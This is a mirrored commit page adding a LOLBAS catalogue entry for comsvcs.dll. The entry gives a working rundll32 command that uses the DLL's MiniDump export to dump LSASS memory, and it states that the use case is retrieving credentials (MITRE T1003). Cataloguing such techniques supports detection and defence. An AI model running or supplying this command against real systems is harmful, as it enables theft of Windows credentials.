mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 14:59:03 +01:00
Merge pull request #44 from plowsec/master
Add Comsvcs.yml: dump lsass via signed DLL.
This commit is contained in:
commit
f9f381d616
26
yml/OSLibraries/comsvcs.yml
Normal file
26
yml/OSLibraries/comsvcs.yml
Normal file
@ -0,0 +1,26 @@
|
|||||||
|
---
|
||||||
|
Name: Comsvcs.dll
|
||||||
|
Description: COM+ Services
|
||||||
|
Author:
|
||||||
|
Created: '2019-08-30'
|
||||||
|
Commands:
|
||||||
|
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
|
||||||
|
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
|
||||||
|
UseCase: Dump Lsass.exe process memory to retrieve credentials.
|
||||||
|
Category: Dump
|
||||||
|
Privileges: SYSTEM
|
||||||
|
MitreID: T1003
|
||||||
|
MItreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||||
|
OperatingSystem: Windows
|
||||||
|
Full_Path:
|
||||||
|
- Path: c:\windows\system32\comsvcs.dll
|
||||||
|
Code_Sample:
|
||||||
|
- Code: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
|
||||||
|
Detection:
|
||||||
|
- IOC:
|
||||||
|
Resources:
|
||||||
|
- Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
|
||||||
|
Acknowledegment:
|
||||||
|
- Person: modexp (modexp.wordpress.com)
|
||||||
|
Handle:
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user